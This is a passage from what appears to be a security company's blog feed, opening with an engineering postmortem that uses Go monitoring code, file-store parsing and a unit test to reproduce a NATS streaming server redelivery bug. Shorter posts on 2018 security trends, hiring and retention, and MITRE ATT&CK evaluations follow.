          "max_inflight": 8192, 
          "ack_wait": 30, 
          "last_sent": 10929, 
          "pending_count": 0, 
          "is_stalled": false 
        },
        {
          "client_id": "HiggoBot_30489_128befbc", 
          "inbox": "_INBOX.wUiUbK6U8Z67tzJP6Qjrb7", 
          "ack_inbox": "_STAN.subacks.54V6hblM4Dt4B7KyUzRYy5.sensor.session.open.MlAS38Z7DK0TE1rZoocXvp", 
          "queue_name": "sensor.session.open:sensor.session.openhiggo.qg", 
          "is_durable": true, 
          "is_offline": false, 
          "max_inflight": 8192, 
          "ack_wait": 30, 
          "last_sent": 11055, 
          "pending_count": 0, 
          "is_stalled": false 
        }
      ]
    }
    

    Here we see 11,055 messages have been published so far to sensor.session.open with last_seq. But last_sent for one of the three subscribers, SessBotOpen, is 126 messages behind. This is bad.

    We observed /channelsz several more times. Each time, last_sent for SessBotOpen did not increase while the other two subscribers kept up with the channel’s last_seq. Moreover, the pending_count for SessBotOpen remained at zero. If messages were delivered but unacknowledged, we’d expect this count to be more than zero.

    We suspected NATS streaming server was not delivering published messages to SessBotOpen.  This microservice learns where to route sensor tasks by observing messages published to this channel.
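    The same /channelsz data also lends itself to simple automated monitoring. Below is a hypothetical Go sketch (not our production tooling; the host, port, and channel name are assumptions matching the output above) that flags a subscriber whose last_sent lags the channel's last_seq while pending_count stays at zero -- exactly the pattern we observed:

    package main

    import (
        "encoding/json"
        "fmt"
        "log"
        "net/http"
    )

    // channelInfo is a minimal view of the /streaming/channelsz?subs=1 response.
    type channelInfo struct {
        Name          string `json:"name"`
        LastSeq       uint64 `json:"last_seq"`
        Subscriptions []struct {
            ClientID     string `json:"client_id"`
            LastSent     uint64 `json:"last_sent"`
            PendingCount int    `json:"pending_count"`
        } `json:"subscriptions"`
    }

    func main() {
        // Hypothetical monitoring endpoint; adjust host, port, and channel as needed.
        url := "http://localhost:8222/streaming/channelsz?subs=1&channel=sensor.session.open"
        resp, err := http.Get(url)
        if err != nil {
            log.Fatal(err)
        }
        defer resp.Body.Close()

        var ch channelInfo
        if err := json.NewDecoder(resp.Body).Decode(&ch); err != nil {
            log.Fatal(err)
        }

        for _, sub := range ch.Subscriptions {
            // A subscriber that is behind with nothing pending is suspicious:
            // messages are neither being delivered nor awaiting acknowledgement.
            if sub.LastSent < ch.LastSeq && sub.PendingCount == 0 {
                fmt.Printf("WARNING: %s is %d messages behind on %s\n",
                    sub.ClientID, ch.LastSeq-sub.LastSent, ch.Name)
            }
        }
    }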

    A review of NATS issues showed us earlier this summer a similar bug was reported by Todd Schilling in nats-streaming-server issue #584.

    This bug was fixed in v0.10.2 by Ivan Kozlovic. We were still using v0.9.2 in October.

    While it’s enticing to assume an upgrade of NATS streaming server would resolve our issue, we had no proof that issue #584 was the root cause. Assumptions are the enemy of debugging. We did not know how to reproduce the problem. Without a reproduction, we could not promise our customers and partners that the problem was fixed -- and that’s really important to us.

    Reproduction

    To come up with a reproduction theory we could test, we looked at the evidence and studied the NATS streaming server code.

    During an upgrade, we noticed a new log message when NATS streaming server was restarted.

    Oct  3 01:16:24 endgame nats-streaming-server[28574]: DEBUG STREAM: [Client:SessBotOpen_29704_38898667] Redelivering to subid=17, durable=sensor.session.open:sensor.session.openSessBotOpen.qg
    

    We’d not seen this log before. To see what it indicates, take a look at the code that produces it in server.go line 3087 from NATS streaming server v0.9.2 on github.

    This log comes from a function named performDurableRedelivery(). It is called when NATS needs to resend a durable subscriber’s outstanding (unacknowledged) messages.

    Let’s learn more about durable subscribers. Per the nats.io documentation, a durable subscription persists its position in the channel across client and server restarts: when the client reconnects with the same durable name, delivery resumes from the earliest unacknowledged message.

    Our SessBotOpen client uses a durable subscription. Messages sent to it before NATS streaming server was restarted were redelivered after the restart because they had not been acknowledged.

    Two of the subscriptions to this subject are durable. This means there is additional evidence that can reveal what happened in the file stores on disk. The location of these files is managed by the configuration file.

    The structure of these files is defined here in filestore.go. Each time a message is published to the durable queue, it is saved to msgs.x.dat and indexed in msgs.x.idx in a function called writeRecord(), defined here in filestore.go on line 657.

    If you search for calls to writeRecord in filestore.go, you’ll see this data could help us reproduce the bug. The timestamps associated with each message in the index seem especially useful.

    To see this data, we created parse-nats-data.

    Let’s examine messages from an exemplar system where we observed a similar problem. We focus on the last message published before NATS restarted and the first one after it came back online. We restarted NATS streaming server at 2018-10-03 01:16:24 UTC.

    [root@endgame endgame]# ./parser -i /opt/endgame/var/natssd/sensor.session.open/msgs.1.idx -d /opt/endgame/var/natssd/sensor.session.open/msgs.1.dat
    [2018-10-03 01:13:59.825685034 +0000 UTC] seq: 10929 | size: 913 | offset: 10218743 | crc32: e55eeefc msg size: 913
    [2018-10-03 01:19:03.261193242 +0000 UTC] seq: 10930 | size: 884 | offset: 10219664 | crc32: a58d8ed1 msg size: 884
    

    Recall earlier that last_sent for client SessBotOpen was stuck at message 10,929. Now we have evidence it was the last message sent before the restart.

    Next let’s look at the subs.dat subscriber data for sensor.session.open to see what else we can learn. This file records several interesting subscription and message events. The types of events stored in this file are described in filestore.go on line 383.

    The subs.dat file records the following events:

    • New subscription to a subject

    • Updates to an existing subscription

    • Subscription deletes (unsubscribes)

    • Message acknowledgements

    • Delivered messages

    Analyzing this evidence could help us reproduce the bug. This file uses the same on-disk record format as the message files. The structure of each record is defined in nats-streaming-server/spb.

    NATS streaming records metadata about every message and each subscription activity. Let’s focus only on the SessBotOpen client that subscribes to sensor.session.open.

    In the output below from parse-nats-data, we’ve included just three event types:

    • New or updated subscriptions

    • First published message after SessBotOpen subscribes

    • First acknowledged message after SessBotOpen subscribes

    [root@endgame endgame]# ./parser -t subscriptions /opt/endgame/var/natssd/sensor.session.open/subs.dat
    ID: 2 "SessBotOpen_10792_bcff6c27" Type: subRecNew LastSent: 0
    ID: 2 SeqNo: 1 subRecMsg
    ID: 2 SeqNo: 1 subRecAck
    ID: 2 "SessBotOpen_2421_1b27960d" Type: subRecUpdate LastSent: 7271
    ID: 2 SeqNo: 7272 subRecMsg
    ID: 2 SeqNo: 7272 subRecAck
    ID: 2 "SessBotOpen_3564_35a06f8d" Type: subRecUpdate LastSent: 7381
    ID: 2 SeqNo: 7382 subRecMsg
    ID: 2 SeqNo: 7382 subRecAck
    ID: 2 "SessBotOpen_7104_959261a6" Type: subRecUpdate LastSent: 7492
    ID: 2 SeqNo: 7493 subRecMsg
    ID: 2 SeqNo: 7493 subRecAck
    ID: 17 "SessBotOpen_2415_b7e88646" Type: subRecNew LastSent: 9517
    ID: 17 SeqNo: 9518 subRecMsg
    ID: 17 SeqNo: 9518 subReqAck
    ID: 17 "SessBotOpen_2340_3a3b37c5" Type: subRecUpdate LastSent: 9599
    ID: 17 SeqNo: 9599 subRecAck
    ID: 17 "SessBotOpen_8193_05e875e3" Type: subRecNew LastSent: 9517
    ID: 17 SeqNo: 9600 subRecMsg
    ID: 17 SeqNo: 9600 subRecAck
    ID: 17 "SessBotOpen_2979_e926b758" Type: subRecNew LastSent: 10863
    ID: 17 SeqNo: 10864 subRecMsg
    ID: 17 SeqNo: 10864 subRecAck
    ID: 17 "SessBotOpen_29704_38898667" Type: subRecNew LastSent: 10929
    ID: 17 SeqNo: 10929 subRecAck
    

    An interesting pattern emerges in the data above.

    First, we see that the internal NATS subscription ID is frequently reused each time a new SessBotOpen client subscribes after a restart. Not shown in the subs.dat output above are the other new subscriptions: each time other clients subscribe to channels, they seem to get a new subscription ID. SessBotOpen does not. This is unusual.

    Second, each time SessBotOpen subscribes to sensor.session.open, we see the next message in the sequence (last_sent + 1) published and acknowledged – except for two clients:

    • SessBotOpen_2340_3a3b37c5

    • SessBotOpen_29704_38898667

    In both cases, something unique happens. After SessBotOpen subscribes, an outstanding message is acknowledged. Specifically, the last_sent message before the restart.

    Recall performDurableRedelivery() is responsible for redelivering all outstanding messages to a durable subscriber when it resubscribes. Let’s go back to the NATS streaming server logs.

    [root@endgame log]# zcat natssd*.gz | grep Redelivering
    Sep  5 19:34:07 endgame nats-streaming-server[1042]: DEBUG STREAM: [Client:SessBotOpen_2340_3a3b37c5] Redelivering to subid=17, durable=sensor.session.open:sensor.session.openSessBotOpen.qg
    Oct  3 01:16:24 endgame nats-streaming-server[28574]: DEBUG STREAM: [Client:SessBotOpen_29704_38898667] Redelivering to subid=17, durable=sensor.session.open:sensor.session.openSessBotOpen.qg
    

    We see the same two clients from subs.dat. This is a compelling lead. And it’s possible the problem also occurred on this exemplar system back in September but we didn’t detect it. NATS streaming server was restarted 8 minutes later.

    What do we know? To reproduce the bug, it seems important to publish a message but force the subscriber to wait to acknowledge it until after NATS is restarted. We also observe that the subscription ID rarely changes while other subscriptions change each time they subscribe.

    Let’s focus on recreating the two specific scenarios we observed in subs.dat.

    • Theory: There is a race condition in acknowledging messages during a NATS restart when a durable queue resubscribes and is assigned the same subscription ID.

    • Test: Let’s write a NATS streaming server test to recreate these two conditions.

    The NATS streaming server unit test we create must do the following things:

    1. Ensure we’re using the file system store with getTestDefaultOptsForPersistentStore()

    2. Provide the ability to delay message acknowledgement in our QueueSubscribe() callback function

    3. Publish one message

    4. Close down the subscription so that it resubscribes with the same subscription ID after a restart

    5. Restart NATS before the callback attempts to acknowledge it

    6. Resubscribe with a new callback function that will acknowledge messages

    7. Make sure new messages are delivered

    We’ll create a new test called TestRedeliveryBug and setup the data store first. It can help us validate that we’ve recreated the two earlier observations from subs.dat. The unit test is shown in full at the end of this blog.

    There are two key ingredients to the test derived from our analysis of subs.dat.

    First, we need to control how long we take to acknowledge messages in the callback function to recreate the message acknowledgement race condition. This is one of the two important conditions we want to recreate from subs.dat. We’ll send one message and wait 5 seconds before we acknowledge it. This will give us time to restart NATS streaming server.

    Second, we need to force the subscriber to reuse the same internal subscription ID. The NATS streaming server Remove() function shown below from server.go from line 858 reuses subscription IDs if the client does not first unsubscribe.

    // Remove a subscriber from the subscription store, leaving durable
    // subscriptions unless `unsubscribe` is true.
    func (ss *subStore) Remove(c *channel, sub *subState, unsubscribe bool)
    

    We want to unsubscribe our callback function in our test so it does not receive data. This is similar to what happens when we restart NATS and the SessBotOpen microservice. We can call closeClient() first, which eventually calls Remove(), to ensure the subscription ID is reused on restart.

    After we restart, we resubscribe, acknowledge messages quickly (in 10ms instead of 5s) and publish 20 new messages. If we recreate the bug, none of these messages will get delivered.

    Let’s see if we can recreate the bug on v0.9.2 of NATS streaming server.

    [vagrant@smp server]$ go test -run TestRedeliveryBug -v 
    === RUN   TestRedeliveryBug
    [Test] publishing [seq 0] before restart
    [Callback 1] received seq 1 (redelivered = false)
    [Test] Restarting NATS
    [Test] Waiting for 5 seconds before sending new data...
    [Callback 2] received seq 1 (redelivered = true)
    [Test] publishing [seq 0] after restart
    [Test] publishing [seq 1] after restart
    [Test] publishing [seq 2] after restart
    [Test] publishing [seq 3] after restart
    [Test] publishing [seq 4] after restart
    [Test] publishing [seq 5] after restart
    [Test] publishing [seq 6] after restart
    [Test] publishing [seq 7] after restart
    [Test] publishing [seq 8] after restart
    [Test] publishing [seq 9] after restart
    [Test] publishing [seq 10] after restart
    [Test] publishing [seq 11] after restart
    [Test] publishing [seq 12] after restart
    [Test] publishing [seq 13] after restart
    [Test] publishing [seq 14] after restart
    [Test] publishing [seq 15] after restart
    [Test] publishing [seq 16] after restart
    [Test] publishing [seq 17] after restart
    [Test] publishing [seq 18] after restart
    [Test] publishing [seq 19] after restart
    delivered: 1 redelivered: 1
    --- FAIL: TestRedeliveryBug (23.59s)
        server_bug_test.go:128: Did not get all redelivered messages
    FAIL
    exit status 1
    FAIL	github.com/nats-io/nats-streaming-server/server	23.606s
    

                                     Executing TestRedeliveryBug on NATS streaming server v0.9.2

    No new messages were delivered to the subscriber when the acknowledgement was delayed until after a restart – even after it acknowledged the outstanding message!

    Let’s run the same test again against the latest version of NATS streaming server (v0.11.2).

    [vagrant@smp server]$ git checkout v0.11.2
    Previous HEAD position was 6026da1... Merge pull request #545 from nats-io/prepare_for_next_release
    HEAD is now at 7b758bb... Merge pull request #672 from nats-io/new_release
    [vagrant@smp server]$ go test -run TestRedeliveryBug -v 
    === RUN   TestRedeliveryBug
    [Test] publishing [seq 0] before restart
    [Callback 1] received seq 1 (redelivered = false)
    [Test] Restarting NATS
    [Test] Waiting for 5 seconds before sending new data...
    [Callback 2] received seq 1 (redelivered = true)
    [Test] publishing [seq 0] after restart
    [Callback 2] received seq 2 (redelivered = false)
    [Test] publishing [seq 1] after restart
    [Test] publishing [seq 2] after restart
    [Test] publishing [seq 3] after restart
    [Test] publishing [seq 4] after restart
    [Test] publishing [seq 5] after restart
    [Test] publishing [seq 6] after restart
    [Test] publishing [seq 7] after restart
    [Test] publishing [seq 8] after restart
    [Test] publishing [seq 9] after restart
    [Test] publishing [seq 10] after restart
    [Test] publishing [seq 11] after restart
    [Test] publishing [seq 12] after restart
    [Callback 2] received seq 3 (redelivered = false)
    [Test] publishing [seq 13] after restart
    [Test] publishing [seq 14] after restart
    [Test] publishing [seq 15] after restart
    [Test] publishing [seq 16] after restart
    [Test] publishing [seq 17] after restart
    [Test] publishing [seq 18] after restart
    [Test] publishing [seq 19] after restart
    [Callback 2] received seq 4 (redelivered = false)
    [Callback 2] received seq 5 (redelivered = false)
    [Callback 2] received seq 6 (redelivered = false)
    [Callback 2] received seq 7 (redelivered = false)
    [Callback 2] received seq 8 (redelivered = false)
    [Callback 2] received seq 9 (redelivered = false)
    [Callback 2] received seq 10 (redelivered = false)
    [Callback 2] received seq 11 (redelivered = false)
    [Callback 2] received seq 12 (redelivered = false)
    [Callback 2] received seq 13 (redelivered = false)
    [Callback 2] received seq 14 (redelivered = false)
    [Callback 2] received seq 15 (redelivered = false)
    [Callback 2] received seq 16 (redelivered = false)
    [Callback 2] received seq 17 (redelivered = false)
    [Callback 2] received seq 18 (redelivered = false)
    [Callback 2] received seq 19 (redelivered = false)
    [Callback 2] received seq 20 (redelivered = false)
    delivered: 20 redelivered: 1
    --- PASS: TestRedeliveryBug (8.80s)
    PASS
    ok  	github.com/nats-io/nats-streaming-server/server	8.813s
    

                                     Executing TestRedeliveryBug on NATS streaming server v0.11.2


    It works as expected! All messages, including the first outstanding message, were delivered to [Callback 2]. We also observed the same behavior in subs.dat by using parse-nats-data on the unit test’s file store that was left behind.

    We reproduced the bug!

    Where was the bug?

    Now that we have a reproduction, let’s see where the bug lives. The sendAvailableMessagesToQueue() function in server.go line 4572 is responsible for sending messages to subscriptions.

    // Send any messages that are ready to be sent that have been queued to the group.
    func (s *StanServer) sendAvailableMessagesToQueue(c *channel, qs *queueState) {
        if c == nil || qs == nil {
            return
        }
    
        qs.Lock()
        if qs.newOnHold {
            qs.Unlock()
            return
        }
        for nextSeq := qs.lastSent + 1; qs.stalledSubCount < len(qs.subs); nextSeq++ {
            nextMsg := s.getNextMsg(c, &nextSeq, &qs.lastSent)
            if nextMsg == nil {
                break
            }
            if _, sent, sendMore := s.sendMsgToQueueGroup(qs, nextMsg, honorMaxInFlight); !sent || !sendMore {
                break
            }
        }
        qs.Unlock()
    }
    

                                    sendAvailableMessagesToQueue() function in server.go

    Note that if qs.newOnHold is true, messages do not get delivered. We observed that updateState() from server.go sets this to true when the two conditions from subs.dat happen to a durable subscription in v0.9.2. It’s never set to false again and new messages never get delivered.

    Let’s see why it works in v0.11.2 by finding the same line of code in updateState(). We see this specific code was moved up to the conditional above it in this commit on 3 July 2018.

    It was NATS streaming server issue #584 all along! And if we look at the test added for this fix, it’s very similar to our test – only better.

    Conclusion

    In this postmortem we reviewed the symptoms of an incident that occurred after an upgrade for our cloud customers. We narrowed the problem down to a durable subscriber that was not receiving new messages after a restart. Further analysis of the evidence and code allowed us to reproduce a bug in NATS streaming server.

    At Endgame Engineering, we take production incidents seriously. We want to earn the trust of our customers by proving the same problem will not happen twice. These postmortems are opportunities for us to share what we learned, how we improved, and the tools we’ve built with the community.

    Here are a few lessons learned.

    Debugging is mostly studying code and evidence

    Debugging is a discipline. It requires comparing evidence with code (99% of the time it will be code you didn’t write or don’t remember writing). Assumptions in evidence or in how something works may seem like they save you time but they are the enemy of debugging. They will take up more time or worse – you’ll just be wrong.

    I still find myself making assumptions. But I have to remind myself that while I can be wrong, the evidence and code usually aren’t.

    Tenacity is important

    When it comes to delivering customer value -- don’t give up. Especially if you’ll learn something that can be shared with others. We tested three different theories to try and reproduce the bug. After the first two experiments failed, I was almost ready to give up. But there was more unexplored evidence in subs.dat. That was the breakthrough that led to a reproduction.

    Code readability is important

    This seems obvious, but studying code is so much easier when it’s straightforward and understandable. It’s one of the advantages of using NATS streaming server. It’s very simple and easy to read. Code and design readability helps others, and even your future self, understand what the code is doing so that it can be debugged quickly.

    Chaos experiments are important

    We need to make a larger investment in chaos experiments to tease out new failures in production. While simplicity matters, it’s important to embrace and navigate the emergent complexity in our systems and organizations.

    Today we craft a number of experiments to study failure and build confidence in our ability to withstand turbulent conditions in production at massive scale. This problem showed us we can do more. We’re looking forward to sharing more of this with the community in upcoming blog posts on the topic.

    In the meantime, I recommend you watch Casey Rosenthal’s GOTO Chicago 2018 talk, Deprecating Simplicity.

    Create tools to find failure

    Building tools is an essential part of debugging and experimenting to find failure. In addition to parse-nats-data, we are also sharing another tool we’ve built in Go, aws-logsearch, to search multiple AWS CloudWatch log groups at once on the command line. This allowed our incident responders to quickly validate this problem did not impact other customers.

    This postmortem analysis was rewarding. I hope you found it useful.

    Appendix: Reproduction Unit Test

    The unit test in its entirety to recreate the two conditions we observed from subs.dat is shown below.

    package server
    
    import (
        "fmt""testing""time""sync/atomic""github.com/nats-io/go-nats""github.com/nats-io/go-nats-streaming"
    )
    
    func TestRedeliveryBug(t *testing.T) {
        // [1] Setup file store for the test
        cleanupDatastore(t)
        defer cleanupDatastore(t)
        opts := getTestDefaultOptsForPersistentStore()
    
        // Setup channel to signal all messages delivered/redelivered
        ch := make(chan bool, 1)
        delivered := int32(0)
        redelivered := int32(0)
    
        // Start server and connect to NATS streaming
        s := runServerWithOpts(t, opts, nil)
        defer shutdownRestartedServerOnTestExit(&s)
    
        sc, nc := createConnectionWithNatsOpts(t, clientName, nats.ReconnectWait(100*time.Millisecond))
        defer nc.Close()
        defer sc.Close()
    
        // [2] Subscription callback
        //
        // id:        unique ID for callback
        // ackWait:   how long to wait before acknowledging the message in ms
        // totalMsgs: total number of messages we plan on sending
        //
        newCb := func(id int, ackWait int, totalMsgs int) func(m *stan.Msg) {
            return func(m *stan.Msg) {
    
                // Wait for ackWait milliseconds before acknowledging this message
                fmt.Printf("[Callback %d] received seq %d (redelivered = %t)\n", id, m.Sequence, m.Redelivered)
                time.Sleep(time.Duration(ackWait) * time.Millisecond)
                m.Ack()
    
                // Count deliveries/redeliveries
                if !m.Redelivered {
                    atomic.AddInt32(&delivered, 1)
                } else {
                    atomic.AddInt32(&redelivered, 1)
                }
    
                // Only signal success if the callback after a restart (ID=2) gets all new messages and outstanding messages
                if id == 2 && delivered == int32(totalMsgs) && redelivered == int32(1) {
                    ch <- true
                }
            }
        }
    
        // [3] Publish only one message
        totalMsgs := 1
    
        // Wait 5 seconds to acknowledge the message
        sub, err := sc.QueueSubscribe(
            "foo",
            "queue",
            newCb(1, 5000, totalMsgs),
            stan.MaxInflight(1),
            stan.SetManualAckMode(),
            stan.DurableName("durable"),
            stan.AckWait(ackWaitInMs(30)))
        if err != nil {
            t.Fatalf("Unexpected error on subscribe: %v", err)
        }
    
        // Send one message
        for i := 0; i < 1; i++ {
            fmt.Printf("[Test] publishing [seq %d] before restart\n", i)
            if err := sc.Publish("foo", []byte("msg")); err != nil {
                t.Fatalf("Unexpected error on publish: %v", err)
            }
        }
    
        // [4] Force the client to get the same subscription ID when it resubscribes after a restart
        s.closeClient(clientName)
        s.Shutdown()
        sub.Unsubscribe()
    
        // [5] Restart server
        s = runServerWithOpts(t, opts, nil)
    
        sc, nc = createConnectionWithNatsOpts(t, "the_new_me", nats.ReconnectWait(100*time.Millisecond))
        defer nc.Close()
        defer sc.Close()
    
        // Send 20 new messages
        totalMsgs = 20
    
        // [6] Resubscribe, acknowledge messages and validate we get all new and redelivered messages
        _, err = sc.QueueSubscribe(
            "foo",
            "queue",
            newCb(2, 10, totalMsgs),
            stan.MaxInflight(1),
            stan.SetManualAckMode(),
            stan.DurableName("durable"),
            stan.AckWait(ackWaitInMs(30)))
        if err != nil {
            t.Fatalf("Unexpected error on subscribe: %v", err)
        }
    
        fmt.Printf("[Test] Waiting for 5 seconds before sending new data...\n")
        time.Sleep(5000 * time.Millisecond)
    
        // [7] Send 20 new messages
        for i := 0; i < int(totalMsgs); i++ {
            fmt.Printf("[Test] publishing [seq %d] after restart\n", i)
            if err := sc.Publish("foo", []byte("msg")); err != nil {
                t.Fatalf("Unexpected error on publish: %v", err)
            }
        }
    
        select {
        case <-ch:
            // All messages were redelivered, we are ok
        case <-time.After(15 * time.Second):
            fmt.Printf("delivered: %d redelivered: %d\n", delivered, redelivered)
            t.Fatal("Did not get all redelivered messages")
        }
    
        fmt.Printf("delivered: %d redelivered: %d\n", delivered, redelivered)
    }
    

    2018 in Review: Beyond the FUD

    $
    0
    0

    Looking back over 2018, we saw the good and bad that comes with widespread use and abuse of the Internet. Data breaches continued throughout the year, with several in 2018 being among the largest of all time. In the fourth quarter alone, Marriott and Quora announced major breaches affecting 600 million people. And what thanks do we get? Ryuk, a ransomware attack that halted the distribution of some of the nation’s largest newspapers. But it wasn’t all doom and gloom.

    A study from Accenture out earlier in the year found that while the number of cyberattacks against organizations has more than doubled, nearly 87 percent of them are prevented. That’s an increase of 17 percent from 2017.

    While the Accenture findings demonstrate that organizations are performing better at mitigating the impact of cyberattacks, they still have more work to do. Only two out of five organizations are currently investing in breakthrough technologies like machine learning, artificial intelligence and automation, indicating there is ground to be gained by increasing investment in cyber resilience solutions.

    A look back at some of the breakthroughs of 2018

    If you follow the cybersecurity industry, you would have been hard pressed to miss MITRE ATT&CK™ last year - the impressive new model of attacker behavior built into advanced endpoint protection technology. Using the ATT&CK framework, an organization can assess its visibility against targeted attacks with the tools it already has deployed. In the case of Ryuk, aligning coverage across ATT&CK would enable detection as the adversary is pre-positioning.

    Artificial intelligence and machine learning security technologies, combined with human expertise, have rapidly evolved to offer a promising path forward. While machine learning addresses the failures of signature-based technologies such as traditional AV, it can simultaneously learn from the behavior of malware inside a network to predict and prevent future attacks. This human-computer interaction is designed to equip security practitioners with the tools they need to better protect their organizations.

    With these and other advancements in cyber technology, organizations stand a better chance against attacks than ever before. The challenge now is for the cybersecurity industry to make it easy for organizations to adopt next-generation endpoint protection.

    Making endpoint protection as simple as AV

    Endgame is proud to lead the market with a completely original and publicly-validated endpoint protection platform. It incorporates AI-backed, natural language understanding technology to reduce the specialized labor bottleneck that security leaders face and enable IT operations personnel to effectively defend their enterprise. Endgame complements this usability with operational flexibility via a delivery model that supports cloud and on-premises options to accommodate the global compliance requirements of complex organizations. And, it’s all run on a single autonomous agent providing both online and disconnected endpoints complete prevention, detection, and response across the MITRE ATT&CK framework.

    Endgame is purpose-built to consistently block a wide range of attacks, including those such as Ryuk, which can exploit a new vulnerability and spread rapidly across a network. Our layered prevention technology protects organizations from all forms of targeted and never-before-seen attacks, including ransomware, malware, phishing and fileless attacks.

    2019 is the year that enterprises take back the endpoint, demand real time visibility and the assurance of endpoint protection without the operational cost and risk of incessant signature file updates, new modules per attacker technique, and missed exploits. This is the year that attack prevention, and detection and response automation, makes it easy to say yes to AV replacement.

    Year In Review: Our Top Posts From 2018

    $
    0
    0

    Happy New Year! Before we dive back in, we wanted to take a quick look back at a few of your favorites. Here are our five most popular posts from 2018:

    #1 - Putting the MITRE ATT&CK Eval into Context
    MITRE published the results of their first public EDR product evaluation. This evaluation is a great achievement from MITRE, and we look forward to working with MITRE on continually refining the process and participating in future tests. As we reflect on the test and what it means, we would like to add some perspective to put the results into context.
    Read More

    #2 - It’s The Endgame For Phishing
    With version 3.0 of the Endgame Protection Platform, Endgame has delivered the best prevention against document-based phishing attacks - the execution of malicious documents attached to email or delivered through social channels.
    Read More

    #3 - Getting Started with EQL
    Event Query Language (EQL) is a language for expressing relationships between events. It can also normalize your data regardless of data source, unconstrained by platform. Now that EQL has been open-sourced, you too can adopt the language and start writing your own adversarial detections, regardless of underlying technology.
    Read More

    #4 - Introducing Ember: An Open Source Classifier And Dataset
    Ember (Endgame Malware BEnchmark for Research) is an open source collection of 1.1 million portable executable file (PE file) sha256 hashes that were scanned by VirusTotal sometime in 2017. With this dataset, researchers can now quantify the effectiveness of new machine learning techniques against a well defined and openly available benchmark.
    Read More

    #5 - Detecting Spectre And Meltdown Using Hardware Performance Counters
    For several years, security researchers have been working on a new type of hardware attack that exploits cache side-effects and speculative execution to perform privileged memory disclosure. These new vulnerability classes consisted of two distinct flaws named Spectre and Meltdown. 
    Read More

    Elevator Assets: Building Your Mission-Focused Team

    $
    0
    0

    I recently had a great time as a guest on the CISO/Security Vendor Relationship podcast with David Spark and Mike Johnson, CISO of Lyft. Part of our discussion focused on the challenges of hiring in the security industry. Whether your perspective is that the shortage is real and growing, or that the surge of interest among college entrants just hasn't yet caught up to the demand, the fact remains that security practitioners enjoy one of the lowest unemployment rates of any career. As a security practitioner who has seen the industry evolve over the past decade, I found that our conversation got me thinking about the driving forces behind this shortfall of nearly three million people.

    Often, when we discuss the skills gap challenge in cyber security, we focus on finding talented people. There is also a key challenge in retaining those personnel. A 2018 report from ISC, Hiring and Retaining Top Security Talent, reveals a staggering statistic: only 15% of cybersecurity professionals have “no plans” to leave their current employment. That means the majority of your employees, peers and coworkers are ripe for being poached by another company, or even your biggest competitor. While training, well-defined responsibilities and C-suite transparency are all important measures to improve employee satisfaction, it's clear that security managers need to look deeper if they are to meaningfully combat the retention crisis.

    At Endgame, we learned quickly that our employees craved the opportunity to solve hard problems - it's why they joined a startup! - but they needed autonomy to discover new, innovative solutions. As a product leader, I could see how permitting autonomy might seem counterintuitive to shipping features quickly: just define what to do and have it built to spec. However, over and over again it has been proven that empowering our team to find the ideal solution to a customer challenge has led to more customer delight and faster feature delivery.

    Attract and hire employees that give a shit 


    Your company values cannot just be aspirational words on a wall; they need to be the star that guides you in hiring, promoting, and even firing. Unless your values are practiced, they are meaningless. Nearly every organization that has a problem with "churn" has a gap between its aspirational and practiced values. And it almost always starts at the top.

    Living by our values, even when it has not been easy or convenient, is what has led to the fantastic culture at Endgame. From the start, we set out to only hire people who lived up to our company values, the core of which is the title of this section. We've had to make some difficult decisions to stay true to those values - from taking a chance on an untested-but-eager recent graduate to letting go of exceptionally capable players who lacked the right attitude. We strive to find and retain people that are mission-focused, and who care about the customer’s problem more than anything else. Passion is the fuel great products are built upon.

    Encourage people to fail

    That’s right. Let people know it is ok to fail. Our CEO often reiterates, “failing does not make you a failure,” and I could not agree more. The only way to innovate and wow your customers is to strive for new ways to solve their problems. If you foster a this-must-always-work attitude among your team, you will destroy the spark of innovation inside them. Allow them to fail, and to learn, and to grow. Your customers will thank you for the results.

    Lead with the “why”

    If you are in a leadership position, you should constantly repeat the “why” behind what you ask of your team. People that give a shit do not want to only be told “how” to accomplish the mission. They want to understand why - the core problem we are trying to solve and how can they contribute to fixing it. When you lead with the “why” you allow your team to help discover solutions you may never have considered without collective brainstorming and you allow them to connect their work directly to the value it brings to customers. The Manager Tools series, Leader’s Intent, does a great job of delving into topics such as these.

    When you hire mission-focused people, provide them with the autonomy to solve hard problems, and constantly communicate the “why” behind the ask, you will see your retention rate improve. At Endgame, focusing on these themes has brought our retention rate far above industry average, something we are immensely proud of. These principles not only increase retention, but also increase productivity. When employees feel empowered to make decisions because they understand the "why," work - great work - is completed faster.

    Is MITRE ATT&CK the New “Next-Gen”?

    $
    0
    0

    It’s been 18 months since Endgame became the first endpoint protection vendor to go through a publicly disclosed ATT&CK tactics-based simulation run by the MITRE Corporation. Our early adoption and commitment to the ATT&CK matrix is what makes us the only endpoint protection vendor capable of making nation-state level protection attainable by everyone, regardless of the size or skills of a security team.

    Only a year ago, Crowdstrike became the second vendor to jump aboard the MITRE ATT&CK train, and I called on the rest of the industry to use this framework and evaluation to move away from scare-ware marketing and buzzword bingo. See also #nomorenextgen.

    And then most recently, in November 2018, MITRE published the raw data associated with their first round of commercial evaluations against the ATT&CK elements used in an APT3-like simulation. Finally, we have some actual data that organizations can use to evaluate and compare the most relevant vendors in the Endpoint Protection space, right? Well, kinda.

    Remember when everyone was “Next-gen” and everyone was “Machine Learning”?

    It turns out that most organizations don’t want to run their own analysis.

    If you kept up with the various vendor responses, you will have noticed that with the exception of one or two vendors, the facts behind the evaluation and usefulness of the data are already starting to get lost among the desperate scrambling for the “ATT&CK certified” tick-box badge of honor. In the same way that “Next-Gen” became the nonsensical feature and capability everyone wanted in 2016, the huge value of ATT&CK is at risk of becoming diluted outside of the practitioner community.

    But there are still signs of hope as Forrester prepares to release its independent analysis of the first round of MITRE ATT&CK evaluation data. Forrester’s Josh Zelonis already published the data-gathering python scripts behind the Measuring Vendor Accuracy blog post (which mapped to Endgame’s own analysis). With other analyst firms asking how they can use data in their market research, there are strong indications that ATT&CK is reaching peak adoption outside of the vendor industry.

    Without considering your organization's own context, ATT&CK is just another data-point

    Although ATT&CK is more useful than any other testing framework that’s come before it, it’s not perfect. You can argue that it rewards vendors who alert on everything, despite the noise and false-positive rate that would make it useless for almost anyone. It doesn’t evaluate how you use the detection data, nor how vendors streamline the response and remediation to a detection. And it doesn’t factor in the financial and human costs associated with actually using the solutions in the same way as the evaluation, such as data storage costs, MDR or managed alerting services, cloud-only analysis, or even the fact that every vendor provided their own dedicated Blue Team to sift through alerts and point out detections that weren’t immediately obvious.

    Remember though, post-breach detection is but one part of a capable endpoint protection solution. It doesn’t evaluate the accuracy or effectiveness of the prevention capabilities to stop even the most common initial methods of compromise.

